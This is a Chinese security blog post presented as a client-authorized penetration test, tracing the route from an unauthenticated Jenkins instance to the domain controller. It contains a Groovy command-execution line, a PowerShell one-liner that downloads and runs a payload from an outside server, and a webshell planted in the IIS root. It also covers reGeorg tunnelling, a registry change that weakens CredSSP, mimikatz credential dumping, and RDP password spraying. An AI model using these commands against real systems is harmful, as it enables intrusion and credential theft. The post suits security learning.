问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
从Jenkins未授权到拿下域控的过程
从Jenkins未授权到拿下域控的过程
目标 -- 任务:从外网进入内网服务器,获取资产内网漫游,拿到域控 客户给定资产:<http://122.x.x.205:8080/> ### 0x01 入口 很幸运找到一个Jenkins漏洞 可以命令执行 默认system权限 通过`println "cmd.exe /c whoami".execute().text`执行命令得到结果为  简单收集了下信息: ***Windows2012 x64 内网服务器 存在杀软*** 接着cs生成个powershell脚本进行转发,没有上线 ```php powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://118.**.**.**/payload.ps1'))" ``` 又换了mshta等等常见反弹手法,均失败,且没有回显,ping百度返回超时,判断服务器没有出网http协议的道已经走不通 尝试走dns隧道53端口协议反弹到cs,需解析配置好域名和vps地址,然后cs里开启dns监听,生成payload,但是dns生成的payload也得上传到shell里运行  既然服务器http不通,远程下载payload并运行的方式也行不通,jsp的war包也不知道放在什么地方 但是发现,80端口开启,是iis管理器的默认主页 dir命令找到iis默认目录C:\\inetpub\\wwwroot\\,再使用echo写入一个asp一句话到网站根目录 ***成功getshell***  计划传aspx大马,结果网站目录任何文件传不了,权限过小  ### 0x02提权之一波三折 **这里一波三折,后续复盘发现绕了很多弯路,但是作为测试当时的真实情况,记录出来让大家避坑** 看到iis权限那就先提个权,再弹个system权限到cs即可,使用了各种提权方法,均提权失败了 尝试传exe文件发现网站就把我测试的ip封了,换和ip刷新文件夹发现缺exe传成功,但是文件破损了 发现服务器装了git工具,测试git clone <https://github.com/xxx/> 成功下载文件C:\\ProgramData\\ what?之前不是不出http协议网吗,netstat -ano看了下  发现有些端口与其他外网的443有连接,所以git clone可以远程下载,这里依次执行了exe、py、ps1都无法上线 突然想到在Jenkins里是system权限,于是找了个可写目录传aspx大马,接着move到网站根目录,拿到aspx大马   在C:\\ProgramData\\ 目录传了dns协议生成的ps木马,执行没反应,传raw生成的木马放到shellcode免杀里生成exe,执行也无回显 但是另一个朋友说他生成的上线了,自己测试,shell内执行一直转圈也不上线 。无头绪了,已经**凌晨四点**了,明天再搞(后来设置监听为http 监听端口为443 即可上线) ### 0x03内网转发 起床后理一理思路 既然上不线,用reGeorg转发不也一样,把tunnel.aspx到C:\\ProgramData\\ move到iis目录访问 成功访问  OK,本地reGeorg.py监听并配置Proxifier `python reGeorgSocksProxy.py -p 446 -u http://122.**.**.**/tunnel.aspx`  Proxifier配置:  远程连接即可  提示当前允许连接的用户过多 解决方案: mstsc /admin /v:192.168.15.82  然后还是无法连接 解决方法: `在\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` 目录下新建项,在名称中输入`CredSSP,在CredSSP`上右键单击选择 新建》项 名称中输入Parameters确定,在Parameters上右键单击新建》DWORD(32位)值(D)修改名称为AllowEncryptionOracle 。在AllowEncryptionOracle 上右键单击选择修改,将“数值数据(V)”改为2, 此时确定,关闭所有重新打开mstsc连接发现可以用了。`  成功登录: mstsc /admin /v:192.168.52.18  致此前渗透阶段完成。 ### 0x04横向渗透 上传mimikatz抓到当前机器administertor密码 使用超级弱口令扫了下整个b段的rdp,字典内加入抓取到的administertor密码,成功扫到8台机器  并且成功上线cs马 在这台机器的cs里执行hashdump获取登录凭证,并横向到192.168.15.70和76机器    可以看到成功横向上线 经过常规的信息收集,找到192.168.15.14这台机器为域控 到76机器执行mimikatz抓取域用户密码,尝试登录域控没有成功,可能权限不够 接着去看70机器,发现有个ssm服务,(sqlserverManage)此进程极大可能是域管运行,所以这台机器内存中可能存在域管密码,mimikatz抓取  ```php Username : Supertrans Domain : TRANSASIA Password : XXXXXXX ```  至此成功拿下域控。 ### 0x05技术总结 1、通过Jenkins获取入口 2、各种折腾提权以及转发 3、收集主机密码 4、通过收集的密码爆破B端机器 5、通过B端权限抓取域控密码 6、获取域控权限
发表于 2021-04-07 20:51:32
阅读 ( 8500 )
分类:
内网渗透
3 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
50 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!